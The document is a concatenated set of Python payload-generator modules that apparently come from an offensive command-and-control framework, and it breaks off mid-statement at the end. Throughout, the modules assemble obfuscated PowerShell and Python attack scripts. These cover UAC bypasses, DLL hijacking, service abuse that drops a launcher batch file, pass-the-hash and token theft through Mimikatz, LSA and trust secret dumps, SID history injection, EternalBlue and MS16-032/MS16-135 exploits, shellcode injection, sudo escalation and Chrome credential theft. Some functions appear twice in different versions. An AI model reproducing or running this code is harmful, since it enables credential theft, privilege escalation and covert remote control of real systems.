def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# staging options
user_agent = params["UserAgent"]
proxy = params["Proxy"]
proxy_creds = params["ProxyCreds"]
listener_name = params["Listener"]
if (params["Obfuscate"]).lower() == "true":
launcher_obfuscate = True
else:
launcher_obfuscate = False
launcher_obfuscate_command = params["ObfuscateCommand"]
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " +
listener_name)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(
listenerName=listener_name,
language="powershell",
encode=True,
obfuscate=launcher_obfuscate,
obfuscationCommand=launcher_obfuscate_command,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxyCreds,
bypasses=params["Bypasses"],
)
if launcher == "":
return handle_error_message(
"[!] Error in launcher generation.")
else:
script_end = 'Invoke-BypassUAC -Command "%s"' % (launcher)
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
# staging options
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
module_name = 'Write-HijackDll'
# read in the common powerup.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script = module_code
script_end = ';' + module_name + " "
# extract all of our options
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command, userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds, bypasses=params['Bypasses'])
if launcher == "":
return handle_error_message("[!] Error in launcher command generation.")
else:
out_file = params['DllPath']
script_end += " -Command \"%s\"" % (launcher)
script_end += " -DllPath %s" % (out_file)
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(module.name.split("/")[-1]) + ' completed!"'
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
listener_name = params['Listener']
# staging options
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-FodHelperBypass.ps1"
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " +
listener_name)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(
listener_name,
language='powershell',
encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds,
bypasses=params['Bypasses'])
enc_script = launcher.split(" ")[-1]
if launcher == "":
return handle_error_message(
"[!] Error in launcher generation.")
else:
script += "Invoke-FodHelperBypass -Command \"%s\"" % (
enc_script)
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.credtype != "hash":
return handle_error_message("[!] An NTLM hash must be used!")
if cred.username != "":
params["user"] = cred.username
if cred.domain != "":
params["domain"] = cred.domain
if cred.password != "":
params["ntlm"] = cred.password
if params["ntlm"] == "":
print(helpers.color("[!] ntlm hash not specified"))
# build the custom command with whatever options we want
command = "sekurlsa::pth /user:"******"user"]
command += " /domain:" + params["domain"]
command += " /ntlm:" + params["ntlm"]
# base64 encode the command to pass to Invoke-Mimikatz
script_end = "Invoke-Mimikatz -Command '\"" + command + "\"'"
script_end += (
';"`nUse credentials/token to steal the token of the created PID."'
)
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
script_end = "\nInvoke-SSHCommand "
# if a credential ID is specified, try to parse
cred_id = params["CredID"]
if cred_id != "":
if not main_menu.credentials.is_credential_valid(cred_id):
return handle_error_message("[!] CredID is invalid!")
cred: Credential = main_menu.credentials.get_credentials(cred_id)
if cred.username != "":
params["Username"] = str(cred.username)
if cred.password != "":
params["Password"] = str(cred.password)
if params["Username"] == "":
return handle_error_message(
"[!] Either 'CredId' or Username/Password must be specified.")
if params["Password"] == "":
return handle_error_message(
"[!] Either 'CredId' or Username/Password must be specified.")
for option, values in params.items():
if option.lower() != "agent" and option.lower() != "credid":
if values and values != "":
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
list_tokens = params["list"]
elevate = params["elevate"]
revert = params["revert"]
admin = params["admin"]
domainadmin = params["domainadmin"]
user = params["user"]
processid = params["id"]
script_end = "Invoke-Mimikatz -Command "
if revert.lower() == "true":
script_end += "'\"token::revert"
else:
if list_tokens.lower() == "true":
script_end += "'\"token::list"
elif elevate.lower() == "true":
script_end += "'\"token::elevate"
else:
return handle_error_message(
"[!] list, elevate, or revert must be specified!")
if domainadmin.lower() == "true":
script_end += " /domainadmin"
elif admin.lower() == "true":
script_end += " /admin"
elif user.lower() != "":
script_end += " /user:"******"":
script_end += " /id:" + str(processid)
script_end += "\"';"
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# Set booleans to false by default
obfuscate = False
listener_name = params['Listener']
# staging options
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
if (params['Obfuscate']).lower() == 'true':
obfuscate = True
obfuscate_command = params['ObfuscateCommand']
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-WScriptBypassUAC.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
if not main_menu.listeners.is_listener_valid(listener_name):
# not a valid listener, return nothing for the script
return handle_error_message("[!] Invalid listener: " + listener_name)
else:
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=True,
obfuscate=obfuscate,
obfuscationCommand=obfuscate_command, userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds, bypasses=params['Bypasses'])
if launcher == "":
return handle_error_message("[!] Error in launcher generation.")
else:
script_end = "Invoke-WScriptBypassUAC -payload \"%s\"" % (launcher)
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common powerup.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/privesc/PowerUp.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
service_name = params['ServiceName']
# # get just the code needed for the specified function
# script = helpers.generate_dynamic_powershell_script(moduleCode, "Write-ServiceEXECMD")
script = module_code
# generate the .bat launcher code to write out to the specified location
launcher = main_menu.stagers.stagers['windows/launcher_bat']
launcher.options['Listener'] = params['Listener']
launcher.options['UserAgent'] = params['UserAgent']
launcher.options['Proxy'] = params['Proxy']
launcher.options['ProxyCreds'] = params['ProxyCreds']
launcher.options['ObfuscateCommand'] = params['ObfuscateCommand']
launcher.options['Obfuscate'] = params['Obfuscate']
launcher.options['Bypasses'] = params['Bypasses']
if params['Delete'].lower() == "true":
launcher.options['Delete'] = "True"
else:
launcher.options['Delete'] = "False"
launcher_code = launcher.generate()
# PowerShell code to write the launcher.bat out
script_end = ";$tempLoc = \"$env:temp\\debug.bat\""
script_end += "\n$batCode = @\"\n" + launcher_code + "\"@\n"
script_end += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
script_end += "\"Launcher bat written to $tempLoc `n\";\n"
if launcher_code == "":
return handle_error_message("[!] Error in launcher .bat generation.")
else:
script_end += "\nInstall-ServiceBinary -ServiceName \""+str(service_name)+"\" -Command \"C:\\Windows\\System32\\cmd.exe /C $tempLoc\""
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
list_tokens = params['list']
elevate = params['elevate']
revert = params['revert']
admin = params['admin']
domainadmin = params['domainadmin']
user = params['user']
processid = params['id']
script = module_code
script_end = "Invoke-Mimikatz -Command "
if revert.lower() == "true":
script_end += "'\"token::revert"
else:
if list_tokens.lower() == "true":
script_end += "'\"token::list"
elif elevate.lower() == "true":
script_end += "'\"token::elevate"
else:
return handle_error_message("[!] list, elevate, or revert must be specified!")
if domainadmin.lower() == "true":
script_end += " /domainadmin"
elif admin.lower() == "true":
script_end += " /admin"
elif user.lower() != "":
script_end += " /user:"******"":
script_end += " /id:" + str(processid)
script_end += "\"';"
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
# extract all of our options
service_name = params["ServiceName"]
# generate the .bat launcher code to write out to the specified location
launcher = main_menu.stagers.stagers["windows/launcher_bat"]
launcher.options["Listener"] = params["Listener"]
launcher.options["UserAgent"] = params["UserAgent"]
launcher.options["Proxy"] = params["Proxy"]
launcher.options["ProxyCreds"] = params["ProxyCreds"]
launcher.options["Delete"] = "True"
launcher_code = launcher.generate()
# PowerShell code to write the launcher.bat out
script_end = ';$tempLoc = "$env:temp\\debug.bat"'
script_end += '\n$batCode = @"\n' + launcher_code + '"@\n'
script_end += "$batCode | Out-File -Encoding ASCII $tempLoc ;\n"
script_end += '"Launcher bat written to $tempLoc `n";\n'
if launcher_code == "":
return handle_error_message(
"[!] Error in launcher .bat generation.")
script_end += (
'Invoke-ServiceAbuse -ServiceName "' + service_name +
'" -Command "C:\\Windows\\System32\\cmd.exe /C `"$env:Temp\\debug.bat`""'
)
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/exploitation/Exploit-EternalBlue.ps1"
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
script = module_code
script += "\nInvoke-EternalBlue "
for key, value in params.items():
if value != '':
if key.lower() == "shellcode":
# transform the shellcode to the correct format
script += " -" + str(key) + " @(" + str(value) + ")"
else:
script += " -" + str(key) + " " + str(value)
script += "; 'Exploit complete'"
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
script_end = "Invoke-ShellcodeMSIL"
for option, values in params.items():
if option.lower() != "agent":
if values and values != "":
if option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values.split("\\"))[1:]
script_end += " -" + str(option) + " @(" + sc + ")"
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code, obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end = ""
if params['Method'].lower() == "sekurlsa":
script_end += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'"
else:
script_end += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
) -> Tuple[Optional[str], Optional[str]]:
# extract all of our options
listener_name = params["Listener"]
if listener_name not in main_menu.listeners.activeListeners:
return handle_error_message("[!] Listener '%s' doesn't exist!" %
(listener_name))
active_listener = main_menu.listeners.activeListeners[listener_name]
listener_options = active_listener["options"]
script = main_menu.listeners.loadedListeners[
active_listener["moduleName"]].generate_comms(
listenerOptions=listener_options, language="powershell")
# signal the existing listener that we're switching listeners, and the new comms code
script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (
listener_name,
script,
)
script = main_menu.modules.finalize_module(
script=script,
script_end="",
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
script_path = params["ScriptPath"]
script_cmd = params["ScriptCmd"]
script = ""
if script_path != "":
try:
with open(f"{script_path}", "r") as data:
script = data.read()
except:
return handle_error_message(
"[!] Could not read script source path at: " +
str(script_path))
script += "\n"
script += "%s" % script_cmd
script = main_menu.modules.finalize_module(
script=script,
script_end="",
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1"
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
script = module_code
# generate the launcher code without base64 encoding
launcher = main_menu.stagers.stagers['multi/launcher']
launcher.options['Listener'] = params['Listener']
launcher.options['UserAgent'] = params['UserAgent']
launcher.options['Proxy'] = params['Proxy']
launcher.options['ProxyCreds'] = params['ProxyCreds']
launcher.options['Base64'] = 'False'
launcher_code = launcher.generate()
# need to escape characters
launcher_code = launcher_code.replace("`", "``").replace("$", "`$").replace("\"","'")
script += 'Invoke-MS16135 -Command "' + launcher_code + '"'
script += ';"`nInvoke-MS16135 completed."'
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace("module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
if main_menu.obfuscate and not pathlib.Path(obfuscated_module_source).is_file():
script = data_util.obfuscate(installPath=main_menu.installPath, psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# build the custom command with whatever options we want
command = f'"sid::add /sam:{params["User"]} /new:{params["Group"]}"'
command = f"-Command '{command}'"
if params.get("ComputerName"):
command = f'{command} -ComputerName "{params["ComputerName"]}"'
# base64 encode the command to pass to Invoke-Mimikatz
script_end = f"Invoke-Mimikatz {command};"
if main_menu.obfuscate:
script_end = data_util.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/code_execution/Invoke-ShellcodeMSIL.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source, obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source", "obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = "Invoke-ShellcodeMSIL"
for option,values in params.items():
if option.lower() != "agent":
if values and values != '':
if option.lower() == "shellcode":
# transform the shellcode to the correct format
sc = ",0".join(values.split("\\"))[1:]
script_end += " -" + str(option) + " @(" + sc + ")"
if obfuscate:
script_end = helpers.obfuscate(main_menu.installPath, psScript=script_end, obfuscationCommand=obfuscation_command)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""
) -> Tuple[Optional[str], Optional[str]]:
# extract all of our options
listener_name = params['Listener']
if listener_name not in main_menu.listeners.activeListeners:
return handle_error_message("[!] Listener '%s' doesn't exist!" %
(listener_name))
active_listener = main_menu.listeners.activeListeners[listener_name]
listener_options = active_listener['options']
script = main_menu.listeners.loadedListeners[
active_listener['moduleName']].generate_comms(
listenerOptions=listener_options, language='powershell')
# signal the existing listener that we're switching listeners, and the new comms code
script = "Send-Message -Packets $(Encode-Packet -Type 130 -Data '%s');\n%s" % (
listener_name, script)
if obfuscate:
script = helpers.obfuscate(main_menu.installPath,
psScript=script,
obfuscationCommand=obfuscation_command)
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
# build the custom command with whatever options we want
command = f'"sid::add /sam:{params["User"]} /new:{params["Group"]}"'
command = f"-Command '{command}'"
if params.get("ComputerName"):
command = f'{command} -ComputerName "{params["ComputerName"]}"'
# base64 encode the command to pass to Invoke-Mimikatz
script_end = f"Invoke-Mimikatz {command};"
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# extract all of our options
listener_name = params["Listener"]
user_agent = params["UserAgent"]
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(listener_name,
language="python",
userAgent=user_agent)
if launcher == "":
return handle_error_message(
"[!] Error in launcher command generation.")
else:
launcher = launcher.replace('"', '\\"')
script = 'import os; os.system("%s")' % (launcher)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
script_end = ""
if params["Method"].lower() == "sekurlsa":
script_end += "Invoke-Mimikatz -Command '\"sekurlsa::trust\"'"
else:
script_end += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'"
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(main_menu, module: PydanticModule, params: Dict, obfuscate: bool = False, obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16135.ps1"
try:
f = open(module_source, 'r')
except:
return handle_error_message("[!] Could not read module source path at: " + str(module_source))
module_code = f.read()
f.close()
script = module_code
# generate the launcher code without base64 encoding
# generate the launcher code without base64 encoding
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name, language='powershell', encode=False,
userAgent=user_agent, proxy=proxy, proxyCreds=proxy_creds)
# need to escape characters
launcher_code = launcher.replace("`", "``").replace("$", "`$").replace("\"", "'")
script += 'Invoke-MS16135 -Command "' + launcher_code + '"'
script += ';"`nInvoke-MS16135 completed."'
if obfuscate:
script = helpers.obfuscate(main_menu.installPath, psScript=script, obfuscationCommand=obfuscation_command)
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# read in the common module source code
module_source = main_menu.installPath + "/data/module_source/privesc/Invoke-MS16032.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
# generate the launcher code without base64 encoding
listener_name = params['Listener']
user_agent = params['UserAgent']
proxy = params['Proxy']
proxy_creds = params['ProxyCreds']
# generate the PowerShell one-liner with all of the proper options set
launcher = main_menu.stagers.generate_launcher(listener_name,
language='powershell',
encode=False,
userAgent=user_agent,
proxy=proxy,
proxyCreds=proxy_creds)
# need to escape characters
launcher_code = launcher.replace("`", "``").replace("$", "`$").replace(
"\"", "'")
script_end = 'Invoke-MS16-032 "' + launcher_code + '"'
script_end += ';"`nInvoke-MS16032 completed."'
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(
main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = "",
):
# read in the common module source code
script, err = main_menu.modules.get_module_source(
module_name=module.script_path,
obfuscate=obfuscate,
obfuscate_command=obfuscation_command,
)
if err:
return handle_error_message(err)
script_end = "Invoke-Mimikatz -Command "
if params["Username"] != "":
script_end += "'\"lsadump::lsa /inject /name:" + params["Username"]
else:
script_end += "'\"lsadump::lsa /patch"
script_end += "\"';"
script = main_menu.modules.finalize_module(
script=script,
script_end=script_end,
obfuscate=obfuscate,
obfuscation_command=obfuscation_command,
)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
# extract all of our options
listener_name = params['Listener']
user_agent = params['UserAgent']
safe_checks = params['UserAgent']
# generate the launcher code
launcher = main_menu.stagers.generate_launcher(listener_name,
language='python',
userAgent=user_agent,
safeChecks=safe_checks)
if launcher == "":
return handle_error_message(
"[!] Error in launcher command generation.")
else:
password = params['Password']
launcher = launcher.replace('"', '\\"')
launcher = launcher.replace('echo', '')
parts = launcher.split("|")
launcher = "python3 -c %s" % (parts[0])
script = 'import subprocess; subprocess.Popen("echo \\"%s\\" | sudo -S %s", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)' % (
password, launcher)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
list_computers = params["IPs"]
# read in the common powerview.ps1 module source code
module_source = main_menu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
if main_menu.obfuscate:
obfuscated_module_source = module_source.replace(
"module_source", "obfuscated_module_source")
if pathlib.Path(obfuscated_module_source).is_file():
module_source = obfuscated_module_source
try:
with open(module_source, 'r') as f:
module_code = f.read()
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
if main_menu.obfuscate and not pathlib.Path(
obfuscated_module_source).is_file():
script = data_util.obfuscate(
installPath=main_menu.installPath,
psScript=module_code,
obfuscationCommand=main_menu.obfuscateCommand)
else:
script = module_code
script_end += "\n" + """$Servers = Get-DomainComputer | ForEach-Object {try{Resolve-DNSName $_.dnshostname -Type A -errorAction SilentlyContinue}catch{Write-Warning 'Computer Offline or Not Responding'} } | Select-Object -ExpandProperty IPAddress -ErrorAction SilentlyContinue; $count = 0; $subarry =@(); foreach($i in $Servers){$IPByte = $i.Split("."); $subarry += $IPByte[0..2] -join"."} $final = $subarry | group; Write-Output{The following subnetworks were discovered:}; $final | ForEach-Object {Write-Output "$($_.Name).0/24 - $($_.Count) Hosts"}; """
if list_computers.lower() == "true":
script_end += "$Servers;"
for option, values in params.items():
if option.lower() != "agent" and option.lower(
) != "outputfunction":
if values and values != '':
if values.lower() == "true":
# if we're just adding a switch
script_end += " -" + str(option)
else:
script_end += " -" + str(option) + " " + str(values)
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(
module.name.split("/")[-1]) + ' completed!"'
if main_menu.obfuscate:
script_end = data_util.obfuscate(
main_menu.installPath,
psScript=script_end,
obfuscationCommand=main_menu.obfuscateCommand)
script += script_end
script = data_util.keyword_obfuscation(script)
return script
def generate(main_menu,
module: PydanticModule,
params: Dict,
obfuscate: bool = False,
obfuscation_command: str = ""):
module_source = main_menu.installPath + "/data/module_source/collection/Get-SharpChromium.ps1"
if obfuscate:
data_util.obfuscate_module(moduleSource=module_source,
obfuscationCommand=obfuscation_command)
module_source = module_source.replace("module_source",
"obfuscated_module_source")
try:
f = open(module_source, 'r')
except:
return handle_error_message(
"[!] Could not read module source path at: " +
str(module_source))
module_code = f.read()
f.close()
script = module_code
script_end = " Get-SharpChromium"
#check type
if params['Type'].lower() not in [
'all', 'logins', 'history', 'cookies'
]:
print(
helpers.color(
"[!] Invalid value of Type, use default value: all"))
params['Type'] = 'all'
script_end += " -Type " + params['Type']
#check domain
if params['Domains'].lower() != '':
if params['Type'].lower() != 'cookies':
print(
helpers.color(
"[!] Domains can only be used with Type cookies"))
else:
script_end += " -Domains ("
for domain in params['Domains'].split(','):
script_end += "'" + domain + "',"
script_end = script_end[:-1]
script_end += ")"
outputf = params.get("OutputFunction", "Out-String")
script_end += f" | {outputf} | " + '%{$_ + \"`n\"};"`n' + str(
